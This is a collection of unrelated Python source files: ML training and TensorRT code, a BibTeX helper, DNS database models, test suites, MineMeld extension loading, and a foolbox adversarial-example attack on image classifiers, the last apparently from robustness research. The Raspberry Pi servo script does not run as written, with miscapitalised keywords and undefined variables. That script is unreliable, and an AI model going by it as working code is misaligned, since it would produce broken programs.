help="dataset name: ImageNet | CIFAR10 | CIFAR100 (default: '')")
parser.add('--data', type=str, default='datasets', metavar='data_root_path',
help="data root: /path/to/dataset (default: 'datasets')")
parser.add('--test-batch-size', type=int, default=1024, metavar='N',
help='input batch size for testing (default: 1024)')
parser.add('--bn-size', default=None, type=int,
metavar='bn_size', help='bottleneck size')
parser.add('--num-init-features', type=int, default=None,
metavar='num_init_features', help='num_init_features')
parser.add('--compression', type=float, default=1.,
metavar='compression', help='compression at transition')
parser.add('--block-config', type=int, default=None, nargs='+', metavar='model_config',
help='model block config')
parser.add('--epochs', type=int, default=90, metavar='N',
help='number of epochs to train (default: 90)')
parser.add('--lr', type=float, default=0.1, metavar='LR',
help='learning rate (default: 0.1)')
parser.add('--lr-type', default='multistep', type=str, metavar='T',
help='learning rate strategy (default: multistep)',
choices=['multistep', 'cosine', 'triangle'])
parser.add('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add('--clip', type=float, default=4,
help='gradient clipping')
parser.add('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add('--gpus', type=int, default=None, nargs='*', metavar='--gpus 0 1 2 ...',
help='gpu ids for CUDA training')
parser.add('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add('--checkpoints', default='checkpoints', type=str, metavar='checkpoints',
help='checkpoints path')
parser.add('--test-only', action='store_true', default=False,
help='only test model')
parser.add('--visdom', action='store_true', default=False,
help='visualize the process')
parser.add('--log-name', type=str, default='', metavar='LOG_NAME',
help='log name for clarifying')
parser.add('--save-interval', type=int, default=5,
metavar='model_checkpoint_interval', help='model checkpoint save interval')
args = parser.parse_args()
if not args.gpus or (len(args.gpus) > 0 and (args.gpus[0] < 0 or not torch.cuda.is_available())):
args.gpus = []
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed + 1)
random.seed(args.seed + 2)
np.random.seed(args.seed + 3)
kwargs = {'num_workers': 20, 'pin_memory': True} if len(args.gpus) > 0 else {}
train_transform = test_transform = None
if 'CIFAR' in args.dataset:
from torchvision import transforms
if args.dataset == 'CIFAR10':
mean = [125.3 / 255, 123.0 / 255, 113.9 / 255]
std = [63.0 / 255, 62.1 / 255, 66.7 / 255]
else:
mean = [129.3 / 255, 124.1 / 255, 112.4 / 255]
std = [68.2 / 255, 65.4 / 255, 70.4 / 255]
train_transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.Pad(padding=4),
transforms.RandomCrop(32),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
test_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
train_loader = torch.utils.data.DataLoader(
globals()[args.dataset](root=args.data, transform=train_transform, train=True),
batch_size=args.batch_size, shuffle=True, drop_last=True, worker_init_fn=None, **kwargs)
test_loader = torch.utils.data.DataLoader(
globals()[args.dataset](root=args.data, transform=test_transform, train=False),
batch_size=args.test_batch_size, shuffle=False, **kwargs)
num_classes = {"CIFAR10": 10, "CIFAR100": 100, "ImageNet": 1000}
input_size = args.dataset == 'ImageNet' and 224 or 32
model = DenseNet(num_init_features=args.num_init_features, block_config=args.block_config, compression=args.compression,
input_size=input_size, bn_size=args.bn_size, num_classes=num_classes[args.dataset], efficient=True)
print(model)
if not os.path.isdir(args.checkpoints):
os.mkdir(args.checkpoints)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
if 'epoch' in checkpoint:
args.start_epoch = checkpoint['epoch'] + 1
state_dict = checkpoint['state_dict']
else:
state_dict = checkpoint
model.load_state_dict(state_dict=state_dict, strict=False)
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, args.start_epoch - 1))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
print(args)
if len(args.gpus) > 0:
model.cuda()
cudnn.benchmark = True
if len(args.gpus) > 1:
model = nn.DataParallel(model, device_ids=args.gpus).cuda()
engine = Engine()
meter_loss = tnt.meter.AverageValueMeter()
topk = [1, 5]
classerr = tnt.meter.ClassErrorMeter(topk=topk, accuracy=False) # default is also False
confusion_meter = tnt.meter.ConfusionMeter(num_classes[args.dataset], normalized=True)
if args.visdom:
if args.log_name == '':
args.log_name = args.build_type
train_loss_logger = VisdomPlotLogger('line', opts={'title': '[{}] Train Loss'.format(args.log_name)})
train_err_logger = VisdomPlotLogger('line', opts={'title': '[{}] Train Class Error'.format(args.log_name)})
test_loss_logger = VisdomPlotLogger('line', opts={'title': '[{}] Test Loss'.format(args.log_name)})
test_err_logger = VisdomPlotLogger('line', opts={'title': '[{}] Test Class Error'.format(args.log_name)})
confusion_logger = VisdomLogger('heatmap', opts={'title': '[{}] Confusion matrix'.format(args.log_name),
'columnnames': list(range(num_classes[args.dataset])),
'rownames': list(range(num_classes[args.dataset]))})
criterion = nn.CrossEntropyLoss()
def network(sample):
if sample[2]: # train mode
model.train()
else:
model.eval()
inputs, targets = sample[0], sample[1]
if len(args.gpus) > 0:
inputs, targets = inputs.cuda(), targets.cuda()
with torch.set_grad_enabled(sample[2]):
outputs = model(inputs)
loss = criterion(outputs, targets)
return loss, outputs
def network_split_batch(sample):
outputs = Variable()
if len(args.gpus) > 0:
outputs = outputs.cuda()
if args.num_batch_splits >= len(sample[1]):
return network((sample[0], sample[1], sample[2]))
d = (len(sample[1]) + args.num_batch_splits - 1) // args.num_batch_splits
for i in range(args.num_batch_splits):
start = i * d
end = min((i + 1) * d, len(sample[1]))
with torch.set_grad_enabled(sample[2]):
loss, split_outputs = network((sample[0][start:end], sample[1][start:end], sample[2]))
if sample[2] and i < args.num_batch_splits - 1:
loss.backward()
outputs = torch.cat([outputs, split_outputs], dim=0) if len(outputs) > 0 else split_outputs
return loss, outputs
network_forward = network if args.num_batch_splits == 1 else network_split_batch
def on_start(state):
state['epoch'] = args.start_epoch
state['t'] = args.start_epoch * len(state['iterator'])
def on_sample(state):
state['sample'].append(state['train']) # sample[2] is mode
if state['train']:
T_total = state['maxepoch'] * len(state['iterator'])
if args.lr_type == 'multistep':
lr_decay = state['epoch'] // 30
lr = args.lr * 0.1 ** lr_decay
elif args.lr_type == 'cosine':
num_cycles = 4
cycle_len = T_total / num_cycles
lr = 0.5 * args.lr * (1 + math.cos(math.pi * (state['t'] % cycle_len) / cycle_len))
elif args.lr_type == 'triangle':
num_cycles = 4
min_lr = min(1e-3, args.lr)
max_lr = args.lr
cycle_len = int(T_total * 0.9) // num_cycles
if state['t'] < cycle_len * num_cycles:
p = state['t'] % cycle_len
if p < cycle_len / 2:
lr = min_lr + (max_lr - min_lr) * p * 2 / cycle_len
else:
lr = max_lr - (max_lr - min_lr) * (p - cycle_len / 2) * 2 / cycle_len
else:
lr = min_lr * (T_total - state['t']) / (T_total - cycle_len * num_cycles)
# change lr
for group in state['optimizer'].param_groups:
group['lr'] = lr
if state['t'] == state['epoch'] * len(state['iterator']):
for i, p in enumerate(state['optimizer'].param_groups):
print(str(i) + ':', p['lr'])
def reset_meters():
classerr.reset()
meter_loss.reset()
confusion_meter.reset()
def on_start_epoch(state):
reset_meters()
state['iterator'] = tqdm(state['iterator'])
def on_forward(state):
if state['sample'][2]:
nn.utils.clip_grad_norm_(model.parameters(), args.clip)
classerr.add(state['output'].data, state['sample'][1])
confusion_meter.add(state['output'].data, state['sample'][1])
meter_loss.add(state['loss'].item())
def on_end_epoch(state):
# state['epoch'] += 1 is before this function
print('[Epoch {:03d}] Training loss: {:.4f}\tTop 1: {:.2f}\tTop 5: {:.2f}'.format(
state['epoch'] - 1, meter_loss.value()[0], classerr.value(k=1), classerr.value(k=5)))
if args.visdom:
train_loss_logger.log(state['epoch'] - 1, meter_loss.value()[0])
train_err_logger.log(state['epoch'] - 1, classerr.value(k=1))
if state['epoch'] % args.save_interval == 0:
saved_model = model.module if len(args.gpus) > 1 else model
copied_model = copy.deepcopy(saved_model).cpu()
torch.save(obj={'epoch': state['epoch'] - 1, 'state_dict': copied_model.state_dict()},
f=os.path.join(args.checkpoints, args.dataset + '_{:03d}.tar'.format(state['epoch'] - 1)))
# do validation at the end of each epoch
reset_meters()
engine.test(network=network_forward, iterator=test_loader)
if args.visdom:
test_loss_logger.log(state['epoch'] - 1, meter_loss.value()[0])
test_err_logger.log(state['epoch'] - 1, classerr.value()[0])
confusion_logger.log(confusion_meter.value())
print('[Epoch {:03d}] Test loss: {:.4f}\tTop 1: {:.2f}\tTop 5: {:.2f}'.format(
state['epoch'] - 1, meter_loss.value()[0], classerr.value(k=1), classerr.value(k=5)))
if args.test_only:
engine.hooks['on_sample'] = on_sample
engine.hooks['on_forward'] = on_forward
engine.test(network=network_forward, iterator=test_loader)
print('Test loss: {:.4f}\tTop 1: {:.2f}\tTop 5: {:.2f}'.format(
meter_loss.value()[0], classerr.value(k=1), classerr.value(k=5)))
else:
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum,
weight_decay=args.weight_decay, nesterov=True)
engine.hooks['on_start'] = on_start
engine.hooks['on_sample'] = on_sample
engine.hooks['on_forward'] = on_forward
engine.hooks['on_start_epoch'] = on_start_epoch
engine.hooks['on_end_epoch'] = on_end_epoch
engine.train(network=network_forward, iterator=train_loader, maxepoch=args.epochs, optimizer=optimizer)
|
11556212
|
from struct import *
import sys
import io
import os
if len(sys.argv) != 4:
print("Usage: {} [pack/unpack] [input] [output]".format(sys.argv[0]))
sys.exit(1)
if sys.argv[1] == "unpack":
with io.open(sys.argv[2], "rb") as input_file:
with io.open(sys.argv[3], "w", encoding="utf-8") as output_file:
print("Unpacking {} to {}...".format(os.path.basename(sys.argv[2]), os.path.basename(sys.argv[3])))
while True:
target_dlg = unpack("<H", input_file.read(2))[0]
if target_dlg == 0:
print("Done.")
break
print(target_dlg, file=output_file)
print(unpack("<H", input_file.read(2))[0], file=output_file)
# need to do length - 1 to not copy null terminator
print(input_file.read(unpack("<I", input_file.read(4))[0] - 1).decode("cp932"), file=output_file)
input_file.read(1)
elif sys.argv[1] == "pack":
with io.open(sys.argv[2], "r", encoding="utf-8") as input_file:
with io.open(sys.argv[3], "wb") as output_file:
print("Packing {} to {}...".format(os.path.basename(sys.argv[2]), os.path.basename(sys.argv[3])))
input_arr = input_file.read().splitlines()
for x in range(int(len(input_arr) / 3)): # expected to be divisible by 3
idx = x * 3
sjis_str = input_arr[idx + 2].encode("cp932")
output_file.write(pack("<H", int(input_arr[idx]))) # target dlg
output_file.write(pack("<H", int(input_arr[idx + 1]))) # window msg
output_file.write(pack("<I", len(sjis_str) + 1)) # string len
output_file.write(sjis_str) # string
output_file.write(b"\x00")
output_file.write(b"\x00\x00") # terminator
print("Done.")
else:
print("invalid operation!")
|
11556279
|
from pybtex.database import Entry
def cleanup_string(string):
return string.replace('{', '').replace('}', '').replace('\\', '')
def recurse_bibtex(obj, entries):
for b in obj.__class__.__bases__:
if issubclass(b, Citable):
entries.extend(b.BIBTEX_ENTRIES)
recurse_bibtex(b, entries)
def stringify_people(authors):
return ', '.join([cleanup_string(str(p)) for p in authors])
def unique_citations_only(citations):
current_citations = []
for c in citations:
if c not in current_citations:
current_citations.append(c)
return current_citations
def to_bibtex(citations):
import uuid
from pybtex.database import BibliographyData
entries = {str(uuid.uuid4())[:8]: b for b in citations}
bib_data = BibliographyData(entries=entries)
return bib_data.to_string('bibtex')
def handle_publication(fields):
journal = []
if 'journal' in fields:
journal.append(cleanup_string(fields['journal']))
elif 'booktitle' in fields:
journal.append(cleanup_string(fields['booktitle']))
elif 'archivePrefix' in fields:
journal.append(cleanup_string(fields['archivePrefix']))
if 'volume' in fields:
journal.append(cleanup_string(fields['volume']))
elif 'eprint' in fields:
journal.append(cleanup_string(fields['eprint']))
if 'pages' in fields:
journal.append(cleanup_string(fields['pages']))
if 'month' in fields:
journal.append(cleanup_string(fields['month']))
if 'year' in fields:
journal.append(cleanup_string(fields['year']))
return ', '.join(journal)
def construct_nice_printable_string(entry, indent=0):
mystring = ''
indent = ''.join(['\t']*indent)
form = f'{indent}%s\n'
if 'title' in entry.fields:
mystring += form % cleanup_string(entry.fields['title'])
people = entry.persons
if 'author' in people:
mystring += form % stringify_people(people['author'])
mystring += form % handle_publication(entry.fields)
return mystring
class Citable:
"""
Defines a class that contains citation
information.
"""
BIBTEX_ENTRIES = []
"""
List of bibtext entries
"""
def citations(self):
entries = self.BIBTEX_ENTRIES[:]
recurse_bibtex(self, entries)
all_citations = [Entry.from_string(b, 'bibtex')
for b in entries]
return unique_citations_only(all_citations)
def nice_citation(self, prefix='', start_idx=0, indent=0):
entries = self.citations()
if len(entries) == 0:
return ''
return '\n'.join([construct_nice_printable_string(e)
for e in entries])
|
11556287
|
JarsToLabelsInfo = provider(fields = [
"jars_to_labels", # dict of path of a jar to a label
])
|
11556332
|
class Solution:
def minPatches(self, nums: [int], n: int) -> int:
add, i, count = 1, 0, 0
while add <= n:
if i < len(nums) and nums[i] <= add:
add += nums[i]
i += 1
else:
add += add
count += 1
return count
s = Solution()
s.minPatches([1,2,3,8], 80)
|
11556338
|
from ..plugins import create_groupnorm_plugin
from ..torch2trt_dynamic import tensorrt_converter, trt_
@tensorrt_converter('torch.nn.GroupNorm.forward')
def convert_GroupNorm(ctx):
module = ctx.method_args[0]
input = ctx.method_args[1]
input_trt = trt_(ctx.network, input)
weight_trt = trt_(ctx.network, module.weight)
bias_trt = trt_(ctx.network, module.bias)
output = ctx.method_return
num_groups = module.num_groups
eps = module.eps
plugin = create_groupnorm_plugin(
'groupnorm_' + str(id(module)), num_groups=num_groups, eps=eps)
custom_layer = ctx.network.add_plugin_v2(
inputs=[input_trt, weight_trt, bias_trt], plugin=plugin)
output._trt = custom_layer.get_output(0)
|
11556339
|
from setuptools import setup
from setuptools_rust import Binding, RustExtension
import os
setup(name='granne',
version='0.5.2',
rust_extensions=[RustExtension('granne',
'py/Cargo.toml', binding=Binding.RustCPython)],
zip_safe=False,
setup_requires=['setuptools_scm']
)
|
11556354
|
import logging
import pytorch_lightning as pl
from torch import nn
from transformers import AutoConfig, AutoModel, AutoTokenizer
logger = logging.getLogger(__name__)
class PretrainedTransformer(pl.LightningModule):
def __init__(self, args, num_labels=None, mode="base", **config_kwargs):
"Initialize a model."
super().__init__()
self.args = args
cache_dir=self.args.cache_dir if self.args.cache_dir else None
self.config = AutoConfig.from_pretrained(
self.args.config_name if self.args.config_name else self.args.model_name_or_path,
**({"num_labels": num_labels} if num_labels is not None else {}),
cache_dir=cache_dir,
**config_kwargs,
)
self.tokenizer = AutoTokenizer.from_pretrained(
self.args.tokenizer_name if self.args.tokenizer_name else self.args.model_name_or_path,
cache_dir=cache_dir,
use_fast=True,
)
self.model = AutoModel.from_pretrained(
self.args.model_name_or_path,
from_tf=bool(".ckpt" in self.args.model_name_or_path),
config=self.config,
cache_dir=cache_dir,
)
def forward(self, **inputs):
return self.model(**inputs)
@staticmethod
def add_model_specific_args(parser, root_dir):
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pretrained model or model identifier from huggingface.co/models",
)
parser.add_argument(
"--config_name", default="", type=str, help="Pretrained config name or path if not the same as model_name"
)
parser.add_argument(
"--tokenizer_name",
default="",
type=str,
help="Pretrained tokenizer name or path if not the same as model_name",
)
parser.add_argument(
"--cache_dir",
default="",
type=str,
help="Where do you want to store the pre-trained models downloaded from s3",
)
parser.add_argument("--learning_rate", default=5e-4, type=float, help="The initial learning rate for Adam for the non-transformer parameters.")
parser.add_argument("--weight_decay", default=0.0, type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8, type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--warmup_ratio", default=0, type=float, help="The fraction of steps to warm up.")
parser.add_argument(
"--num_train_epochs", default=3, type=int, help="Total number of training epochs to perform."
)
parser.add_argument("--train_batch_size", default=32, type=int)
parser.add_argument("--eval_batch_size", default=32, type=int)
|
11556368
|
import RPi.GPIO as GPIO
import time
import Adafruit_ADS1x15
adc = Adafruit_ADS1x15.ADS1115()
GAIN = 1
adc.start_adc(0, gain=GAIN)
GPIO.setmode(GPIO.BCM)
GPIO.setup(14,GPIO.OUT)
GPIO.setwarnings(False)
servo = GPIO.PWM(14, 50)
servo.start(0)
Def Distance():
D_value = adc0.get_last_result()
D = (1.0 / (F_value / 13.15)) - 0.35
Return D
j=12.5
k=2.5
i=0
distLR=[]
distRL=[]
while True:
while k<=12.5:
servo.ChangeDutyCycle(k)
time.sleep(.1)
distLR.insert(i,Distance())
k = k + 2.5
i = i + 1
print distLR
i=0
k=0
del distLR[:]
while j>=2.5:
servo.ChangeDutyCycle(j)
time.sleep(.1)
j = j - 2.5
distRL.insert(i,Distance())
i = i + 1
print distRL
i=0
k=2.5
j=12.5
del distRL[:]
|
11556370
|
from app import db
class DNSZoneModel(db.Model):
__tablename__ = 'dns_zones'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=True, index=True, default=0)
domain = db.Column(db.String(255), nullable=True, default='', index=True)
active = db.Column(db.Boolean, default=True, index=True)
catch_all = db.Column(db.Boolean, default=True, index=True)
master = db.Column(db.Boolean, default=False, index=True)
forwarding = db.Column(db.Boolean, default=False, index=True)
regex = db.Column(db.Boolean, default=False, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSRecordModel(db.Model):
__tablename__ = 'dns_records'
id = db.Column(db.Integer, primary_key=True)
dns_zone_id = db.Column(db.Integer, nullable=True, index=True, default=0)
ttl = db.Column(db.Integer, nullable=True, default=0)
cls = db.Column(db.String(32), nullable=True, default='', index=True)
type = db.Column(db.String(32), nullable=True, default='', index=True)
data = db.Column(db.Text, nullable=True)
active = db.Column(db.Boolean, default=True, index=True)
has_conditional_responses = db.Column(db.Boolean, default=False, index=True)
conditional_data = db.Column(db.Text, nullable=True)
conditional_count = db.Column(db.Integer, nullable=True, default=0)
conditional_limit = db.Column(db.Integer, nullable=True, default=0)
conditional_reset = db.Column(db.Boolean, default=False, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSQueryLogModel(db.Model):
__tablename__ = 'dns_query_log'
id = db.Column(db.Integer, primary_key=True)
source_ip = db.Column(db.String(128), nullable=True, default='', index=True)
domain = db.Column(db.String(255), nullable=True, default='', index=True)
cls = db.Column(db.String(32), nullable=True, default='')
type = db.Column(db.String(32), nullable=True, default='', index=True)
data = db.Column(db.Text, nullable=True)
found = db.Column(db.Boolean, default=False, index=True)
forwarded = db.Column(db.Boolean, default=False, index=True)
blocked = db.Column(db.Boolean, default=False, index=True)
completed = db.Column(db.Boolean, default=False, index=True)
dns_zone_id = db.Column(db.Integer, nullable=True, default=0, index=True)
dns_record_id = db.Column(db.Integer, nullable=True, default=0, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSZoneRestrictionModel(db.Model):
__tablename__ = 'dns_zone_restrictions'
id = db.Column(db.Integer, primary_key=True)
zone_id = db.Column(db.Integer, nullable=True, default=0, index=True)
ip_range = db.Column(db.String(255), nullable=True, default='', index=True)
type = db.Column(db.Integer, nullable=True, default=0, index=True)
enabled = db.Column(db.Boolean, default=False, index=True)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
class DNSZoneTagModel(db.Model):
__tablename__ = 'dns_zone_tags'
id = db.Column(db.Integer, primary_key=True)
dns_zone_id = db.Column(db.Integer, nullable=True, index=True, default=0)
tag_id = db.Column(db.Integer, nullable=True, index=True, default=0)
# Required in all models.
created_at = db.Column(db.DateTime, nullable=True)
updated_at = db.Column(db.DateTime, nullable=True)
|
11556384
|
import time
import os
import platform
import sys
if platform.system() == 'Darwin':
print 'Skipped for Mac platform'
sys.exit(0)
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from nw_util import *
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("nwapp=" + os.path.dirname(os.path.abspath(__file__)))
driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
driver.implicitly_wait(2)
try:
print driver.current_url
res = wait_for_element_id_content(driver, "result", "URL is: null")
print res
assert("URL is: null" in res)
print "There is no crash"
finally:
driver.quit()
|
11556411
|
import os
import copy
import shutil
import attacks
import foolbox
import numpy as np
from fmodel import create_fmodel
from bmodel import create_bmodel
from utils import read_images, store_adversarial, compute_MAD
test_model_acc = False
def run_attack_curls_whey(model, image, label):
criterion = foolbox.criteria.Misclassification()
attack = attacks.curls_untargeted(model, criterion)
perturbed_image = attack(image, label, scale=1, iterations=5, binary_search=12,
return_early=True, epsilon=0.3, bb_step=3, RO=True,
m=1, RC=True, TAP=False, uniform_or_not=False, moment_or_not=False)
if perturbed_image is None: return None
noise = perturbed_image - image
for i in range(255, 0, -1):
noise_temp = copy.deepcopy(noise)
noise_temp[(noise_temp == i)] //= 2
if (noise != noise_temp).any():
if np.argmax(model.predictions(noise_temp + image)) != label:
noise = copy.deepcopy(noise_temp)
noise_temp = copy.deepcopy(noise)
noise_temp[(noise_temp == -i)] //= 2
if (noise != noise_temp).any():
if np.argmax(model.predictions(noise_temp + image)) != label:
noise = copy.deepcopy(noise_temp)
perturbed_image = noise + image
return perturbed_image
def test(model, attack_func, method_name):
if os.path.exists("results"):
shutil.rmtree("results")
os.mkdir("results");
acc = 0
for (file_name, image, label) in read_images():
if test_model_acc == True:
acc += np.argmax(model.predictions(image)) == label
continue
print(file_name, end="\t\t")
adversarial = attack_func(model, image, label)
store_adversarial(file_name, adversarial)
if adversarial is None:
print("can't find")
elif np.argmax(model.predictions(adversarial)) != label:
print("l2: %.4f" %np.linalg.norm(image/255 - adversarial/255))
else:
print("error");
exit()
if test_model_acc == True:
print("model accuracy: %.4f" %(acc/200)); exit()
print("\n", method_name, "\n")
compute_MAD()
def main():
forward_model = create_fmodel()
backward_model = create_bmodel()
model = foolbox.models.CompositeModel(
forward_model=forward_model,
backward_model=backward_model)
print("\n\nStart Test...")
test(model, run_attack_curls_whey, "Curls & Whey")
if __name__ == '__main__':
main()
|
11556434
|
import torch.utils.data as data
from PIL import ImageFile
from dataset.Parsers.MOT17 import GTParser_MOT_17
from dataset.Parsers.JTA import GTParser_JTA
from dataset.augmentation import SSJAugmentation
ImageFile.LOAD_TRUNCATED_IMAGES = True
class MOT17JTATrainDataset(data.Dataset):
'''
The class is the dataset for train, which read gt.txt file and rearrange them as the tracks set.
it can be selected from the specified frame
'''
def __init__(self,
mot17_root,
mot15_root,
jta_root,
epoch,
arg,
transform=SSJAugmentation,
):
# 1. init all the variables
self.mot17_root = mot17_root
self.mot15_root = mot15_root
self.jta_root = jta_root
self.transform = transform(size=arg.img_size, type='train')
self.epoch = epoch
self.parsers = {}
# 2. init GTParser
self.parser_MOT17 = GTParser_MOT_17(self.mot17_root, 'train', forward_frames=arg.forward_frames,
frame_stride=arg.frame_stride, min_vis=arg.min_visibility,
value_range=arg.value_range)
self.parsers['MOT17'] = self.parser_MOT17
self.parser_JTA = GTParser_JTA(self.jta_root, 'train', forward_frames=arg.forward_frames,
frame_stride=arg.frame_stride, min_vis=0.3,
value_range=arg.value_range)
self.parsers['JTA'] = self.parser_JTA
def __getitem__(self, item):
mot17 = True if item < len(self.parser_MOT17) * self.epoch else False
if mot17:
parser = self.parsers['MOT17']
item = item % len(self.parser_MOT17)
if not mot17:
parser = self.parsers['JTA']
item = (item - len(self.parser_MOT17) * self.epoch) % len(self.parser_JTA)
image, img_meta, tubes, labels, start_frame = parser[item]
while image is None:
print('None processing.')
item += 100
image, img_meta, tubes, labels, start_frame = parser[item % len(parser)]
if self.transform is None:
return image, img_meta, tubes, labels, start_frame
else:
image, img_meta, tubes, labels, start_frame = self.transform(image, img_meta, tubes, labels, start_frame)
return image, img_meta, tubes, labels, start_frame
def __len__(self):
return len(self.parser_MOT17) * self.epoch * 2
|
11556435
|
import os
import tempfile
import unittest
import pandas as pd
from credentialdigger.cli import cli
from credentialdigger.client_sqlite import SqliteClient
from parameterized import param, parameterized
class TestGetDiscoveries(unittest.TestCase):
@classmethod
def setUpClass(cls):
""" Set up a database and insert fake discoveries into it for testing
purposes.
"""
# Set up sqlite database and CSV export temporary paths
cls.tmp_path = tempfile.mkdtemp()
cls.db_path = os.path.join(cls.tmp_path, 'test_db.sqlite')
cls.csv_path = os.path.join(cls.tmp_path, 'test.csv')
# Set up sqlite database
client = SqliteClient(cls.db_path)
client.add_rules_from_file('tests/functional_tests/test_rules.yml')
client.add_repo('test_repo')
# Insert fake discoveries
discoveries = []
discoveries_count = 5
for state in ['new', 'false_positive', 'addressing',
'not_relevant', 'fixed']:
for i in range(discoveries_count):
discovery = {
'file_name': 'danger' if state == 'new' else 'fake_file',
'commit_id': '0xtmp_commit_id',
'line_number': '1',
'snippet': 'tmp_snippet',
'rule_id': 1,
'state': state,
'timestamp': '2021-08-05T01:13',
}
discoveries.append(discovery)
discoveries_count += 1
client.add_discoveries(discoveries, 'test_repo')
@classmethod
def tearDownClass(cls):
""" Remove database and exported CSV after finishing tests. """
os.remove(cls.db_path)
os.remove(cls.csv_path)
@parameterized.expand([
param(state='new', count=5),
param(state='false_positive', count=6),
param(state='addressing', count=7),
param(state='not_relevant', count=8),
param(state='fixed', count=9)
])
def test_get_discoveries(self, state, count):
""" Test if we retrieve the correct number of discoveries for every
possible state value.
Parameters
----------
state: str
The state to filter discoveries on
count: int
The expected number of discoveries to be returned
"""
with self.assertRaises(SystemExit) as cm:
cli.main(
[
'',
'get_discoveries',
'test_repo',
'--sqlite',
self.db_path,
'--save',
self.csv_path,
'--state',
state
]
)
self.assertEqual(cm.exception.code, count)
@parameterized.expand([
param(file='danger', count=5),
param(file='fake_file', count=30)
])
def test_get_discoveries_per_file(self, file, count):
""" Test if we retrieve the correct number of discoveries based on
filename input.
Parameters
----------
file: str
The file name to filter discoveries on
count: int
The expected number of discoveries to be returned
"""
with self.assertRaises(SystemExit) as cm:
cli.main(
[
'',
'get_discoveries',
'test_repo',
'--sqlite',
self.db_path,
'--save',
self.csv_path,
'--filename',
file
]
)
self.assertEqual(cm.exception.code, count)
def test_csv_written(self):
""" Test if the CLI command writes correctly the CSV file. """
with self.assertRaises(SystemExit):
cli.main(
[
'',
'get_discoveries',
'test_repo',
'--sqlite',
self.db_path,
'--save',
self.csv_path
]
)
data_frame = pd.read_csv(self.csv_path)
try:
assert data_frame.notna().values.all()
except AssertionError:
assert False, 'CSV file contains NaN'
|
11556493
|
import sys
import os
import os.path
import json
import logging
from email.parser import Parser
from collections import namedtuple
from zipfile import ZipFile
from pkg_resources import EntryPoint, parse_version
import minemeld.loader
LOG = logging.getLogger(__name__)
__all__ = [
'get_metadata_from_wheel',
'activated_extensions',
'installed_extensions',
'extensions',
'freeze',
'load_frozen_paths'
]
METADATA_MAP = {
'name': 'Name',
'version': 'Version',
'author': 'Author',
'author_email': 'Author-email',
'description': 'Summary',
'url': 'Home-page'
}
InstalledExtension = namedtuple(
'InstalledExtension',
[
'name', 'version', 'author', 'author_email',
'description', 'url', 'path', 'entry_points'
]
)
ActivatedExtension = namedtuple(
'ActivatedExtension',
[
'name', 'version', 'author', 'author_email',
'description', 'url', 'location', 'entry_points'
]
)
ExternalExtension = namedtuple(
'ExternalExtension',
[
'name', 'version', 'author', 'author_email',
'description', 'url', 'path', 'activated',
'installed', 'entry_points'
]
)
def _egg_link_path(dist):
for path_item in sys.path:
egg_link = os.path.join(path_item, dist.project_name + '.egg-link')
if os.path.isfile(egg_link):
return egg_link
return None
def _read_metadata(metadata_str):
return Parser().parsestr(metadata_str)
def _read_entry_points(ep_contents):
ep_map = EntryPoint.parse_map(ep_contents)
for _, epgroup in ep_map.iteritems():
for epname, ep in epgroup.iteritems():
epgroup[epname] = str(ep)
return ep_map
def _activated_extensions():
epgroups = (
minemeld.loader.MM_NODES_ENTRYPOINT,
minemeld.loader.MM_NODES_GCS_ENTRYPOINT,
minemeld.loader.MM_NODES_VALIDATORS_ENTRYPOINT,
minemeld.loader.MM_PROTOTYPES_ENTRYPOINT,
minemeld.loader.MM_API_ENTRYPOINT,
minemeld.loader.MM_WEBUI_ENTRYPOINT
)
activated_extensions = {}
for epgroup in epgroups:
for _, epvalue in minemeld.loader.map(epgroup).iteritems():
if epvalue.ep.dist.project_name == 'minemeld-core':
continue
location = 'site-packages'
egg_link = _egg_link_path(epvalue.ep.dist)
if egg_link is not None:
with open(egg_link, 'r') as f:
location = f.readline().strip()
metadata = {
'name': epvalue.ep.dist.project_name,
'version': epvalue.ep.dist.version,
'author': None,
'author_email': None,
'description': None,
'url': None,
'entry_points': None
}
if egg_link:
try:
with open(os.path.join(location, 'minemeld.json'), 'r') as f:
dist_metadata = json.load(f)
for k in metadata.keys():
metadata[k] = dist_metadata.get(k, None)
except (IOError, OSError) as excpt:
LOG.error('Error loading metatdata from {}: {}'.format(location, str(excpt)))
elif epvalue.ep.dist.has_metadata('METADATA'):
dist_metadata = _read_metadata(
epvalue.ep.dist.get_metadata('METADATA')
)
for k in metadata.keys():
if k in METADATA_MAP and METADATA_MAP[k] in dist_metadata:
metadata[k] = dist_metadata[METADATA_MAP[k]]
if epvalue.ep.dist.has_metadata('entry_points.txt'):
metadata['entry_points'] = _read_entry_points(
epvalue.ep.dist.get_metadata('entry_points.txt')
)
